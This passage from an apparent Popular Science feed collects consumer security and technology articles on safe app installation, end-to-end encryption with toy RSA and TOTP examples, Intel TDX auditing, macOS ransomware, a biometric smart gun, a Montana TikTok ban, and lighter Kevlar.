You could open the Applications folder in Finder, then drag the app’s icon to the Trash to remove it from your system. Alternatively, open Launchpad from the Dock or the Applications folder, click and hold an app icon until it starts shaking, then click the little X icon that appears on it.

Be careful with installers

The setup process in the installer for CCleaner Business Edition.
Tread carefully through software installation routines. David Nield for Popular Science

Plenty of programs will attempt to install extra software while you’re working your way through the initial setup process. Not only will this add extra clutter to your system, it can also be risky from a security perspective—you’re granting access to apps you haven’t fully vetted.

The only way to really guard against this is to pay attention as you install new software, and don’t zone out while clicking the “next” buttons until you’ve reached the end. Watch out for boxes that are checked by default and effectively give permission for the program to install extra software.

[Related: Questions to ask when you’re trying to decide on a new app or service]

You should also be careful about the software developers you trust to install applications on your laptop. There are many honest and reputable smaller developers out there, but always do diligent research before downloading and installing something new: check the history of the developer, and read reviews of the app from existing users.

To be on the safe side, limit yourself to installing apps from the official Microsoft and Apple stores whenever possible—these programs have been vetted, and shouldn’t attempt to install anything extra. On Windows, choose Microsoft Store from the Start menu; on macOS, click the App Store icon in the Dock.

Lock down your browser

The installation process for Dropbox for Gmail extension in a Google Chrome browser.
Check the permissions given to extensions in your browser. David Nield for Popular Science

Your browser is your laptop’s window to the web, so you’ll want to make sure it’s shored up against apps and extensions that surreptitiously install themselves. Keeping your browser updated is the first step, but thankfully modern browsers take care of that automatically (so long as you close all your tabs and restart the browser every once in a while).

Avoid agreeing to install any add-ons or plug-ins you don’t immediately recognize as programs you opted to download. If you’re in any doubt, navigate away from the page you’re on or close the tab.

Watch out for extra toolbars appearing in your browser, or browser settings (like the default search engine) changing without warning—you can always head to the extensions settings page in your browser to remove add-ons you’re not sure about.

When you install a new extension in your browser, you’ll get a pop-up explaining the permissions it has—the data it can see, and the changes it can make to your system. Don’t install any extras on top of your browser without double-checking the developers behind them and reading reviews left by current users.

Practice good security

The app and browser control settings screen on Windows 10, for security.
Windows has a built-in feature guarding against unwanted installations. David Nield for Popular Science

To maximize your protection against applications that would install themselves without your permission, we recommend installing an antivirus package whether you’re on Windows or macOS—you can find a variety of independent reports online to point you towards the best choices. These packages typically include dedicated tools that watch for unexpected software installations.

If you’re on Windows, you can make use of the built-in Windows Defender software that comes with the operating system and specifically checks for the installation of unauthorized apps. On Windows 11, open Settings, click Privacy & security, then Windows Security, Open Windows Security, and App & browser control to make sure the feature is enabled. If you’re still using Windows 10, open Settings, then click Update & Security, Windows Security, and App & browser control.

[Related: How to make sure no one is spying on your computer]

Be very careful when installing anything you’ve found on the web. Double-check you’re accessing it from a trusted website—in the case of Office 365, for example, download it straight from Microsoft rather than a third-party website. If you are downloading applications from the internet, make sure the file you’ve got matches what you thought you were getting.

The same goes for email attachments or links sent over social media—know the warning signs of phishing and other email-based attacks. If someone sends you something you weren’t expecting, whether it’s a document or a download, check the email address (the account may have your brother’s name, but if the email address is unfamiliar, step away) before opening anything.
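One of those warning signs (a familiar display name paired with an unfamiliar address) is easy to check mechanically. Here's a minimal sketch in Python using the standard library's email parsing; the address book and the addresses in it are hypothetical, and a real mail client's heuristics would be far more involved:

```python
from email.utils import parseaddr

# Hypothetical address book: display names you trust, and the one
# address each of them should be writing from.
KNOWN_CONTACTS = {
    "My Brother": "brother@example.com",
}

def looks_spoofed(from_header: str) -> bool:
    """Flag a From: header that borrows a known contact's display name
    but uses a different underlying email address."""
    name, addr = parseaddr(from_header)
    expected = KNOWN_CONTACTS.get(name)
    return expected is not None and addr.lower() != expected

print(looks_spoofed("My Brother <brother@example.com>"))           # False: name and address match
print(looks_spoofed("My Brother <urgent@mail-helpdesk.example>"))  # True: familiar name, unfamiliar address
```

A check like this only catches the simplest impersonation; it says nothing about lookalike domains or compromised real accounts, which is why the human habit of pausing before opening unexpected attachments still matters.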

This story has been updated. It was originally published on February 27, 2019.


]]>
Stop and ask these 5 security questions before installing any app https://www.popsci.com/diy/app-security-questions/ Tue, 02 May 2023 12:23:31 +0000 https://www.popsci.com/?p=538260
A person holding an iPhone with a number of apps on its home screen. We hope they asked these security questions before installing them.
Be selective about what goes on your phone or laptop. Onur Binay / Unsplash

These simple checks will help keep your devices safe from bad apps and bad actors.

The post Stop and ask these 5 security questions before installing any app appeared first on Popular Science.

]]>

There’s a wealth of software available for Windows, macOS, Android, and iOS—but not all of it has been developed with the best intentions. There are apps out there that have been built to steal your data, corrupt your files, spy on your digital activities, and surreptitiously squeeze money out of you.

The good news is that a few smart questions can steer you away from the shady stuff and toward apps you can trust and rely on. If you’re not sure about a particular piece of software for your phone or computer, running through this simple checklist should help you spot the biggest red flags.

1. How old is the app?

Wherever you’re downloading an app from, there should be a mention of when it was last updated. On the Google Play Store on Android devices, for example, you can tap About this app on any listing to see when it was last updated, and what that update included. On iOS, tap Version History.

Old software that hasn’t been updated in the last year or so isn’t necessarily bad, but be wary of it: It’s less likely to work with the latest version of whatever operating system you’re on, and it’s more likely to have security vulnerabilities that can be exploited by bad actors (because it hasn’t been patched against the latest threats).

Don’t automatically trust brand new software either. An app may have been rushed out to cash in on a trend (whether it’s Wordle clones or ChatGPT extensions), and these types of apps are built to make money rather than offer a good user experience or respect your privacy. It may be worth just waiting until you’ve seen some reviews of the app in question.

The app info for an Android app on the Google Play store.
Look out for when the last app update was. David Nield for Popular Science

2. What are other people saying?

That brings us neatly to user reviews, which can be a handy way of gauging an app’s quality. It’s easy to use the dedicated reviews sections in official app stores to see what other people think of the software, but in other scenarios (like downloading a Windows program from the web) you can do a quick web search for the name of the app.

Be sure to check several reviews rather than just relying on one or two, and look for running themes over isolated incidents (the customer isn’t necessarily always right). See what users are saying about bugs and crashes, for example, and how any requests for support have been handled.

[Related: What to do when your apps keep crashing]

Reviews can be faked of course, even in large numbers. Don’t be too trusting of very short and very positive reviews, or reviews left by people with usernames that are generic or look like they might have been created by a bot. Place most faith in longer, more detailed reviews that sound like they’ve been written by someone who’s actually used the software in question.

3. Can you trust the developer?

It doesn’t hurt to run a background check on the person or company that made the software, and the developer’s name should be shown quite prominently on the app listing or the webpage you’re downloading from. Clearly if it’s a well-known name, like Adobe or Google, it’s a piece of software you can rely on.

If you’re on Android or iOS, you can tap the developer name on an app listing to see other apps from the same developer. If they’ve made several apps that all have high ratings, that’s positive. Developer responses to user reviews are a good sign as well, showing that whoever is behind the software is invested in it.

Checking up on the developer of an app that you’re downloading from the wilds of the web isn’t quite as straightforward, but a quick web search for their name should give you some pointers. Developers without any online or social media presence, for instance, should be treated with caution.

4. How much does it cost?

Pay particular attention to how much an app costs, both in terms of up-front fees and ongoing payments: These details are listed on app pages on Android and iOS, and should be fairly straightforward to find on other platforms too. You don’t want an app that’s going to extort money out of you, but you also need to figure out how the costs of development are being supported.

Like the other questions here, there are no hard and fast rules, but if an app is completely free it’s most likely supported through data collection and advertising—this is true from the biggest names in tech, like Facebook and Google, to the smallest independent developers. Freemium models are common too, where some features might be locked behind a paywall.

[Related on PopSci+: You have the power to protect your data. Own it.]

If you get as far as installing an app, go through the opening splash screens very carefully, and pay attention to the terms and conditions. Watch out for any free trials you might be signing up for, which could charge your credit card unexpectedly in a month’s time (even if you’ve uninstalled the app).

The in-app pricing list for Bumble.
Check the app list for any in-app payments. David Nield for Popular Science

5. Which permissions does it need?

If you’re installing an app through an official app store, you should see a list of the permissions it requires, such as access to your camera and microphone. You’ll also get prompts on your phone or laptop when these permissions are requested. Be on the lookout for permissions that seem unreasonable or don’t make sense, as they could indicate a piece of software that’s less trustworthy.

Ideally, apps should explain to you why they need the permissions they do. Access to your contacts, for example, can be used to easily share files with friends and family, rather than to pull any personal data from them. It’s not an exact science, but it’s another way of assessing whether or not you want to install a particular program.

You can change app permissions after they’ve been installed, too, and you should check in on these every once in a while, because settings may change as developers update their apps. We’ve written guides to the process for Windows and macOS, and for Android and iOS. If you think a piece of software is reaching further than it should in terms of permissions, you can block its access rather than uninstalling the app entirely.


]]>
Some of your everyday tech tools lack this important security feature https://www.popsci.com/technology/slack-messages-privacy-encryption/ Sat, 29 Apr 2023 11:00:00 +0000 https://www.popsci.com/?p=537625
slack on a laptop
Austin Distel / Unsplash

You should be paying attention to which apps and services are end-to-end encrypted, and which aren't.

The post Some of your everyday tech tools lack this important security feature appeared first on Popular Science.

]]>

When it comes to computers, convenience and security are often at odds. A simple, easy-to-use system that you can’t lock yourself out of tends to be less secure than something a little less user-friendly. This is often the case with end-to-end encryption (E2EE), a system in which messages, backups, and anything else can only be decrypted by someone with the right key—and not the provider of the service or any other middlemen. While much more secure, it does have some issues with convenience, and it’s been in the news a lot lately. 

The UK Parliament is currently considering its long-awaited Online Safety Bill, which would essentially make secure end-to-end encryption illegal. Both WhatsApp and Signal, which use E2EE for their messaging apps, said they would pull out of the UK market rather than compromise user security. 

Slack, on the other hand, doesn’t use E2EE to protect its users. This means that Slack can theoretically access most messages sent on its service. (The highest-paying corporate customers can use their own encryption setup, but the bosses or IT department can then read any employee messages if they are the ones in control of the key.) Fight for the Future, a digital rights group, has just launched a campaign calling on Slack to change this, as it currently “puts people who are seeking, providing, and facilitating abortions at risk in a post-Roe environment.”

Finally, Google has updated its Authenticator two-factor authentication (2FA) app so that the secret keys used to generate one-time login codes can sync between devices. This means that users don’t need to reconfigure every account with 2FA set up when they get a new phone. Unfortunately, as two security researchers pointed out on Twitter, Google Authenticator doesn’t yet use E2EE, so Google—or anyone who compromised your Google account—can see the secret information used to generate 2FA one-time codes. While exploiting this might take work, it fatally undermines what’s meant to be a secure system. In response, Google has said it will add E2EE, but has given no timeline.
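Those one-time codes come from an open standard: HOTP (RFC 4226) and its time-based variant TOTP (RFC 6238). The app and the server share a secret key, and each code is an HMAC of that secret and a counter (or the current 30-second window). A minimal sketch in Python, using only the standard library:

```python
import hmac
import hashlib
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """One-time code per RFC 4226: HMAC-SHA1 of a counter, dynamically truncated."""
    msg = struct.pack(">Q", counter)                       # counter as 8-byte big-endian
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                             # low 4 bits pick a byte position
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, period: int = 30, digits: int = 6) -> str:
    """Time-based variant (RFC 6238): the counter is the current time window."""
    return hotp(secret, int(time.time()) // period, digits)

# RFC 4226's published test vectors for the secret "12345678901234567890"
assert hotp(b"12345678901234567890", 0) == "755224"
assert hotp(b"12345678901234567890", 1) == "287082"
```

This is why the E2EE question matters here: whoever holds that shared secret can mint valid codes at will, so syncing it through Google’s servers without end-to-end encryption expands who could, in principle, read it.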

[Related: 7 secure messaging apps you should be using]

For such an important technology, E2EE is a relatively simple idea—though the math required to make it work is complicated, relying on operations with very large numbers that are easy to perform in one direction but practically impossible to reverse. It’s easiest to understand with something like text messages, though the same principles can be used to secure other kinds of digital communications—like two-factor authorization codes, device backups, and photo libraries. (For example, messages sent through iMessage, Signal, and WhatsApp are end-to-end encrypted, but a standard SMS message is not.)

E2EE generally uses a system called public key cryptography. Every user has two keys that are mathematically related: a public key and a private key. The public key can genuinely be public; it’s not a secret piece of information. The private key, on the other hand, has to be protected at all costs—it’s what makes the encryption secure. Because the public key and private key are mathematically related, a text message that is encoded with someone’s public key using a hard-to-reverse algorithm can only be decoded using the matching private key. 

So, say Bob wants to send Alice an encrypted text message. The service they’re using stores all the public keys on a central server and each user stores their private keys on their own device. When he sends his message, the app will convert it into a long number, get Alice’s public key from the server (another long number), and run both numbers through the encryption algorithm. That really long number that looks like absolute nonsense to everyone else gets sent to Alice, and her device then decrypts it with her private key so she can read the text. 
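To make that concrete, here is a toy version of RSA, one classic public-key scheme, with deliberately tiny textbook primes. Real keys are thousands of bits long, and real messaging apps layer key exchange, padding, and symmetric ciphers on top of ideas like this, so treat it purely as an illustration of the public/private key relationship:

```python
# Toy RSA with textbook-sized numbers, for illustration only.
p, q = 61, 53                # two secret primes
n = p * q                    # 3233: the modulus, part of both keys
phi = (p - 1) * (q - 1)      # 3120: relates the two exponents
e = 17                       # public exponent (coprime with phi)
d = pow(e, -1, phi)          # 2753: private exponent, the modular inverse of e

def encrypt(message: int, public_key=(e, n)) -> int:
    exp, mod = public_key
    return pow(message, exp, mod)     # anyone can do this with the public key

def decrypt(ciphertext: int, private_key=(d, n)) -> int:
    exp, mod = private_key
    return pow(ciphertext, exp, mod)  # only the private-key holder can undo it

m = 65                       # "a text message converted into a long number"
c = encrypt(m)               # 2790: looks like nonsense to everyone else
assert decrypt(c) == m       # Alice's private key recovers the original
```

Recovering d from the public pair (e, n) requires factoring n back into p and q. With 61 × 53 that is trivial, which is exactly why real keys use primes hundreds of digits long.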

But this example also highlights where E2EE can cause headaches. What happens if Alice loses her device containing her private key? Well, then she can’t decrypt any messages that anyone sends her. And since her private key isn’t backed up anywhere, she has to set up an entirely new messaging account. That’s annoying if it’s a texting app, but if it’s an important backup or a 2FA system, getting locked out of your account because you lost your private key is a very real risk with no good solution. 

And what happens if Bob sends Alice a message about his plans for world domination? Well, if the UK government has a law in place that they must be copied on all messages about world domination, the service provider is in a bit of a bind. They can’t offer E2EE and perform any kind of content moderation. 

This is part of why E2EE is so often in the news. While it’s theoretically great for users, for the companies offering these services, there is a very real trade-off between providing users with great security and setting things up so that customer support can help people who lock themselves out of their accounts, and so that they can comply with government demands and subpoenas. Don’t expect to see encryption out of the news any time soon. 


]]>
Cloud computing has its security weaknesses. Intel’s new chips could make it safer. https://www.popsci.com/technology/intel-chip-trust-domain-extensions/ Tue, 25 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=536626
a computer chip from Intel
Intel's new chip comes with verified security upgrades. Christian Wiediger / Unsplash

A new security feature called Trust Domain Extensions has undergone a months-long audit.

The post Cloud computing has its security weaknesses. Intel’s new chips could make it safer. appeared first on Popular Science.

]]>

Intel and Google Cloud have just released a joint report detailing a months-long audit of a new security feature on Intel’s latest server chips: Trust Domain Extensions (TDX). The report is a result of a collaboration between security researchers from Google Cloud Security and Project Zero, and Intel engineers. It led to a number of pre-release security improvements for Intel’s new CPUs.

TDX is a feature of Intel’s 4th-generation “Sapphire Rapids” Xeon processors, though it will be available on more chips in the future. It’s designed to enable Confidential Computing on cloud infrastructure. The idea is that important computations are encrypted and performed on hardware that’s isolated from the regular computing environment. This means that the cloud service operator can’t spy on the computations being done, and makes it harder for hackers and other bad actors to intercept, modify, or otherwise interfere with the code as it runs. It basically makes it safe for companies to use cloud computing providers like Google Cloud and Amazon Web Services for processing their most important data, instead of having to operate their own secure servers.

However, for organizations to rely on features like TDX, they need some way to know that they’re genuinely secure. As we’ve seen in the past with the likes of Meltdown and Spectre, vulnerabilities at the processor level are incredibly hard to detect and mitigate, and can allow bad actors an incredible degree of access to the system. A similar style of vulnerability in TDX, a supposedly secure processing environment, would be an absolute disaster for Intel, any cloud computing provider that used its Xeon chips, and their customers. That’s why Intel invited the Google security researchers to review TDX so closely. Google also collaborated with chipmaker AMD on a similar report last year.

According to Google Cloud’s blogpost announcing the report, “the primary goal of the security review was to provide assurances that the Intel TDX feature is secure, has no obvious defects, and works as expected so that it can be confidently used by both cloud customers and providers.” Secondarily, it was also an opportunity for Google to learn more about Intel TDX so they could better deploy it in their systems. 

While external security reviews—both solicited and unsolicited—are a common part of computer security, Google and Intel engineers collaborated much more closely for this report. They had regular meetings, used a shared issue tracker, and let the Intel engineers “provide deep technical information about the function of the Intel TDX components” and “resolve potential ambiguities in documentation and source code.”

The team looked for possible methods hackers could use to execute their own code inside the secure area, weaknesses in how data was encrypted, and issues with the debug and deployment facilities. 

In total, they uncovered 81 potential attack vectors and found ten confirmed security issues. All the problems were reported to Intel and were mitigated before these Xeon CPUs entered production. 

As well as allowing Google to perform the audit, Intel is open-sourcing the code so that other researchers can review it. According to the blogpost, this “helps Google Cloud’s customers and the industry as a whole to improve our security posture through transparency and openness of security implementations.”

All told, Google’s report concludes that the audit was a success, since it met its initial goals and “was able to ensure significant security issues were resolved before the final release of Intel TDX.” While there were still some limits to the researchers’ access, they were able to confirm that “the design and implementation of Intel TDX as deployed on the 4th gen Intel Xeon Scalable processors meets a high security bar.” 


]]>
Ransomware intended for Macs is cause for concern, not panic https://www.popsci.com/technology/ransomware-for-macs/ Tue, 18 Apr 2023 22:00:00 +0000 https://www.popsci.com/?p=534984
Internet photo
Unsplash / Martin Katler

While it's a bad sign to see ransomware designed to target macOS, the code so far appears to be sloppy.

The post Ransomware intended for Macs is cause for concern, not panic appeared first on Popular Science.

]]>

For the first time, a prominent ransomware group appears to be actively targeting macOS computers. Discovered last weekend by MalwareHunterTeam, the code sample suggests that the Russia-based LockBit gang is working on a version of its malware that would encrypt files on Mac devices.

Small businesses, large enterprises, and government institutions are frequently the target of ransomware attacks. Hackers often use phishing emails to send real-seeming messages to try to trick staff into downloading the ransomware payload. Once it’s in, the malware spreads around any computer systems, automatically encrypting user files and preventing the organization from operating until a ransom is paid—usually in cryptocurrencies like Bitcoin. 

Over the past few years, ransomware attacks have disrupted fuel pipelines, schools, hospitals, cloud providers, and countless other businesses. LockBit has been responsible for hundreds of these attacks, and in the past six months has brought down the UK’s Royal Mail international shipping service and disrupted operations in a Canadian children’s hospital over the Christmas period.

Up until now, these ransomware attacks mostly targeted Windows, Linux, and other enterprise operating systems. While Apple computers are popular with consumers, they aren’t as commonly used in the kind of businesses and other deep-pocketed organizations that ransomware gangs typically go after. 

MalwareHunterTeam, an independent group of security researchers, only discovered the Mac encryptors recently, but they have apparently been present on malware-tracking site VirusTotal since November last year. One encryptor targets Apple Macs with the newer M1 chips, while another targets those with PowerPC CPUs, which Apple stopped using in 2006. Presumably, there is a third encryptor somewhere that targets Intel-based Macs, although it doesn’t appear to be in the VirusTotal repository. 

Fortunately, when BleepingComputer assessed the Apple M1 encryptor, it found a fairly half-baked bit of malware. There were lots of code fragments that they said “are out of place in a macOS encryptor.” It concluded that the encryptor was “likely haphazardly thrown together in a test.”

In a deep dive into the M1 encryptor, security researcher Patrick Wardle discovered much the same thing. He found that the code was incomplete, buggy, and missing the features necessary to actually encrypt files on a Mac. In fact, since it wasn’t signed with an Apple Developer ID, it wouldn’t even run in its present state. According to Wardle, “the average macOS user is unlikely to be impacted by this LockBit macOS sample,” but the fact that a “large ransomware gang has apparently set its sights on macOS, should give us pause for concern and also catalyze conversations about detecting and preventing this (and future) samples in the first place!”

Apple has also preemptively implemented a number of security features that mitigate the risks from ransomware attacks. According to Wardle, operating system-level files are protected by both System Integrity Protection and read-only system volumes. This makes it hard for ransomware to do much to disrupt how macOS works even if it does end up on your computer. Similarly, Apple protects directories such as the Desktop, Documents, and other folders, so the ransomware wouldn’t be able to encrypt them without user approval or an exploit. This doesn’t mean it’s impossible that ransomware could work on a Mac, but it certainly won’t be easy on those that are kept up-to-date with the latest security features. 

Still, the fact that a large hacking group is seemingly targeting Macs is a big deal—and it’s a reminder that whatever reputation Apple has for developing more secure devices is constantly being put to the test. When BleepingComputer contacted LockBitSupp, the public face of LockBit, the group confirmed that a Mac encryptor is “actively being developed.” While the ransomware won’t do much in its present state, you should always keep your Mac up to date—and be careful with any suspicious files you download from the internet.


]]>
Startup claims biometric scanning can make a ‘secure’ gun https://www.popsci.com/technology/biofire-smart-gun/ Tue, 18 Apr 2023 20:00:00 +0000 https://www.popsci.com/?p=534244
Biofire Smart Gun resting on bricks
The Biofire Smart Gun is a 9mm handgun supposedly secured by fingerprint and facial recognition biometrics. Biofire

Biofire says combining fingerprint and facial scanning with handguns could reduce unintended use. Experts point to other issues.

The post Startup claims biometric scanning can make a ‘secure’ gun appeared first on Popular Science.

]]>

Reports from the Centers for Disease Control and Prevention show gun violence is the leading cause of death among children and adolescents in the United States. In 2021, a separate study indicated over a third of surveyed adolescents alleged being able to access a loaded household firearm in less than five minutes. When the gun was locked in a secure vault or cabinet, nearly one in four claimed they could access it within the same amount of time. In an effort to tackle this problem, a 26-year-old MIT dropout backed by billionaire Peter Thiel is now offering a biometrics-based solution. But experts question its efficacy, citing previous data on gun safety and usage.

Last Thursday, Kai Kloepfer, founder and CEO of Biofire, announced the Smart Gun, a 9mm pistol that only fires after recognizing an authorized user’s fingerprints and facial scans. Using “state-of-the-art” onboard software, Kloepfer claims the Smart Gun is the first “fire-by-wire” weapon, meaning that it relies on electronic signals to operate rather than a traditional firearm’s mechanical trigger. In a profile by Bloomberg, Kloepfer claimed the product takes only “a millisecond” to unlock and said the gun otherwise operates and feels like a standard pistol. He hopes the Smart Gun could potentially save “tens of thousands of lives.”

In a statement provided to PopSci, Kloepfer said, “Firearm-related causes now take the lives of more American children than any other cause, and the problem is getting worse.” He argued that accidents, suicides, homicides, and mass shootings among children are reduced when gun owners have “faster, better tools that prevent the unwanted use of their firearms,” and claims the Smart Gun is “now the most secure option at a time when more solutions are urgently needed.”

[Related: A new kind of Kevlar aims to stop bullets with less material.]

Biometric scanning devices have extensive, documented histories of accuracy and privacy issues, particularly concerning racial bias and safety. Biofire claims that, to maintain the device’s security, the weapon relies upon a solid state, encrypted electronic fire control technology utilized by modern fighter jets and missile systems. Any biometric data stays solely on the firearm itself, the company says, which does not feature onboard Bluetooth, WiFi, or GPS capabilities. A portable, touchscreen-enabled Smart Dock also supplies an interface for the weapon’s owner to add or remove up to five users. The announcement declares the Smart Gun is “impossible to modify” or convert into a conventional handgun. The Smart Gun’s biometric capabilities are powered by a lithium-ion battery that purportedly lasts several months on a single charge, and “can fire continuously for several hours.” 

According to Daniel Webster, Bloomberg Professor of American Health in Violence Prevention and a Distinguished Scholar at the Johns Hopkins Center for Gun Violence Solutions, Biofire may have developed an advancement in gun safety, but he considers its long-term impact on “firearm injury, violence, and suicide” to be “a very open ended question.”

[Related: Two alcohol recovery apps shared user data without their consent.]

“I’d be very cautious about [any] estimated deaths and injuries advertised by the technology,” Webster wrote to PopSci in an email. While Biofire boasts its safety capabilities, “Many of these estimates are based on an unrealistic assumption that these personalized or ‘smart guns’ would magically replace all existing guns that lack the technology… We have more guns than people in the US and I doubt that everyone will rush to melt down their guns and replace them with Biofire guns.”

“The shooting experience is seamless—authorized users can simply pick the gun up and fire it.”
Promotional material for Biofire’s Smart Gun. CREDIT: Biofire

Webster is also unsure who would purchase the Biofire Smart Gun. Citing a 2016 survey he co-conducted and published in 2019, Webster says there appears to be “noteworthy skepticism” among gun owners at the prospect of “personalized” or smart guns. “While we did not describe the exact technology that Biofire is using… interest or demand for personalized guns was greatest among gun owners who already stored their guns safely and were more safety-minded,” he explains.

[Related: Tesla employees allegedly viewed and joked about drivers’ car camera footage.]

For Webster, the main question boils down to how a Biofire Smart Gun will affect people’s exposure to firearms across various types of risk. Although he concedes the technology could hypothetically reduce underage and unauthorized use of improperly stored weapons, there’s no way to know how many new guns might enter people’s lives with the release of the Smart Gun. “How many people [would] bring [Smart Guns] into their homes because the guns are viewed as safe who otherwise wouldn’t?” he asks. Webster also worries that Biofire’s new product won’t address the statistically largest source of gun deaths.

While some self-inflicted harm could be reduced by biometric locks, the vast majority of firearm suicides involve the gun’s owner: according to Pew Research Center, approximately 54 percent (24,292) of all US gun deaths in 2020 were self-inflicted. Additionally, the presence of a gun in a home roughly doubles the risk of domestic homicide, and nearly all such homicides are committed by the gun’s owner.

“Biofire is strongly committed to expanding access to safe and informed gun ownership and emphasizes the importance of education and training to every current and future gun owner,” the company stated in its official announcement. The company plans to begin shipping their Smart Gun in early 2024 at a starting price of $1,499, “in adherence with all applicable state and local regulations.”

The post Startup claims biometric scanning can make a ‘secure’ gun appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Montana may soon make it illegal to use TikTok in the state https://www.popsci.com/technology/montana-tiktok-ban/ Mon, 17 Apr 2023 15:30:00 +0000 https://www.popsci.com/?p=534555
TikTok app download screen on smartphone
It could soon technically be illegal to use TikTok in Montana. Deposit Photos

There is still no definitive proof TikTok or its owner company is surveilling US users.

The post Montana may soon make it illegal to use TikTok in the state appeared first on Popular Science.


Montana is one step away from instituting a statewide ban of TikTok. On Friday, the state’s House of Representatives voted 54-43 in favor of passing SB419, which would blacklist the immensely popular social media platform from operating within the “territorial jurisdiction of Montana,” as well as prohibit app stores from offering it to users. The legislation now heads to Republican Gov. Greg Gianforte, who has 10 days to sign the bill into law, veto it, or allow it to go into effect without issuing an explicit decision.

Although a spokesperson only said that Gov. Gianforte would “carefully consider any bill the Legislature sends to his desk,” previous statements and actions indicate a sign-off is likely. Gianforte banned TikTok on all government devices last year after describing the platform as a “significant risk” for data security.

TikTok is owned by the China-based company ByteDance and faces intense scrutiny from critics on both sides of the political aisle over concerns about users’ privacy. Many opponents of the app also claim it subjects Americans to undue influence and propaganda from the Chinese government. Speaking with local news outlet KTVH last week, Montana state Sen. Shelley Vance alleged that “we know that beyond a doubt that TikTok’s parent company ByteDance is operating as a surveillance arm of the Chinese Communist Party and gathers information about Americans against their will.”

[Related: Why some US lawmakers want to ban TikTok.]

As Gizmodo notes, however, there is still no definitive proof that TikTok or ByteDance is surveilling US users, although company employees do have standard access to user data. Regardless, many privacy advocates and experts warn that the continued focus on TikTok ignores much larger and more pervasive data privacy issues affecting Americans. The RESTRICT Act, for example, is the most notable federal effort to institute a wholesale blacklisting of TikTok, but critics have voiced numerous worries regarding its expansive language, ill-defined enforcement, and unintended consequences. The bill’s fate remains unclear.

If Montana’s SB419 moves forward, it will go into effect on January 1, 2024. The bill proposes a $10,000-per-day fine on any app store, or on TikTok itself, that continues to make the app available within the state after that date. The proposed law does not include any penalties for individual users.

In a statement reported by The New York Times, a TikTok spokesperson said the company “will continue to fight for TikTok users and creators in Montana whose livelihoods and First Amendment rights are threatened by this egregious government overreach.”

A new kind of Kevlar aims to stop bullets with less material https://www.popsci.com/technology/new-kevlar-exo-body-armor/ Sat, 15 Apr 2023 11:00:00 +0000 https://www.popsci.com/?p=534315
The new Kevlar fabric.
The new Kevlar fabric. DuPont

It's not quite the stuff of John Wick's suit, but this novel fiber is stronger than its predecessor.

The post A new kind of Kevlar aims to stop bullets with less material appeared first on Popular Science.


Body armor has a clear purpose: to prevent a bullet, or perhaps a shard from an explosion, from puncturing the fragile human tissue behind it. But wearing it is no small matter, and its weight is measured in pounds. For example, the traditional Kevlar fabric that goes into soft body armor weighs about 1 pound per square foot, and it takes more than one square foot to do the job. 

But a new kind of Kevlar is coming out, and it aims to be just as resistant to projectiles as the original material while also being thinner and lighter. It will not be tailored into a John Wick-style suit, which is the stuff of Hollywood, but DuPont, the company that makes it, says it’s about 30 percent lighter. If regular Kevlar has that approximate weight of 1 pound per square foot, the new material weighs in at about 0.65 to 0.7 pounds per square foot. 

“We’ve invented a new fiber technology,” says Steven LaGanke, a global segment leader at DuPont.

Here’s what to know about how bullet-resistant material works in general, and how the new stuff is different. 

A bullet-resistant layer needs to do two things: stop the bullet from penetrating, and absorb its energy by transferring that energy back into the bullet itself, which ideally deforms on impact. A layer of fabric that caught a bullet but then stretched like a loose net catching a baseball would be bad, explains Joseph Hovanec, a global technology manager at the company. “You don’t want that net to fully extend either, because now that bullet is extending into your body.”

The key is how strong the fibers are, plus the fact that “they do not elongate very far,” says Hovanec. “It’s the resistance of those fibers that will then cause the bullet—because it has such large momentum, [or] kinetic energy—to deform. So you’re actually catching it, and the energy is going into deforming the bullet versus breaking the fiber.” The bullet, he says, should “mushroom.” Here’s a simulation video.

Kevlar is a type of synthetic fiber called a para-aramid, and it’s not the only para-aramid in town: Another para-aramid that can be used in body armor is called Twaron, made by a company called Teijin Limited. Some body armor is also made out of polyethylene, a type of plastic. 

The new form of Kevlar, which the company calls Kevlar EXO, is also an aramid fiber, though slightly different from the original. Regular Kevlar is made up of two monomers (a monomer is a small molecular building block), and the new kind adds one more, for a total of three. “That third monomer allows us to gain additional alignment of those molecules in the final fiber, which gives us the additional strength, over your traditional aramid, or Kevlar, or polyethylene,” says Hovanec.

Body armor in general needs to meet a specific US standard from the National Institute of Justice. The goal of the new kind of Kevlar is that, because it’s stronger, it can meet the same standard while being used in thinner quantities in body armor. For example, regular Kevlar is roughly 0.26 or 0.27 inches thick, and the new material could be as thin as 0.19 inches, says Hovanec. “It’s a noticeable decrease in thickness of the material.”  
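Those two claims line up with each other. As a quick back-of-the-envelope check using the figures quoted above (taking midpoints where a range is given, which is an assumption on our part), the thickness savings tracks the roughly 30 percent weight savings:

```python
# Back-of-the-envelope check of the Kevlar EXO figures quoted in the article.
regular_weight = 1.0       # lb per square foot (approximate, per the article)
exo_weight = 0.7           # lb per square foot (upper end of the 0.65-0.7 range)

regular_thickness = 0.265  # inches (midpoint of the quoted 0.26-0.27 range)
exo_thickness = 0.19       # inches

weight_reduction = 1 - exo_weight / regular_weight
thickness_reduction = 1 - exo_thickness / regular_thickness

print(f"Weight reduction: {weight_reduction:.0%}")        # ~30%
print(f"Thickness reduction: {thickness_reduction:.0%}")  # ~28%
```

Both reductions come out near 30 percent, consistent with DuPont’s claim that the stronger fiber buys the same protection from less material.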

And the ballistic layer that’s made up of a material like Kevlar or Twaron is just one part of what goes into body armor. “There’s ballistics [protection], but then the ballistics is in a sealed carrier to protect it, and then there’s the fabric that goes over it,” says Hovanec. “When you finally see the end article, there’s a lot of additional material that goes on top of it.”

A mom thought her daughter had been kidnapped—it was just AI mimicking her voice https://www.popsci.com/technology/ai-vocal-clone-kidnapping/ Fri, 14 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=534141
Hands holding and using smartphone in night light
It's getting easier to create vocal clones using AI software. Deposit Photo

AI software that clones your voice is only getting cheaper and easier to abuse.

The post A mom thought her daughter had been kidnapped—it was just AI mimicking her voice appeared first on Popular Science.


Scammers are increasingly relying on AI voice-cloning technology to mimic a potential victim’s friends and loved ones in an attempt to extort money. In one of the most recent examples, an Arizonan mother recounted her own experience with the terrifying problem to her local news affiliate.

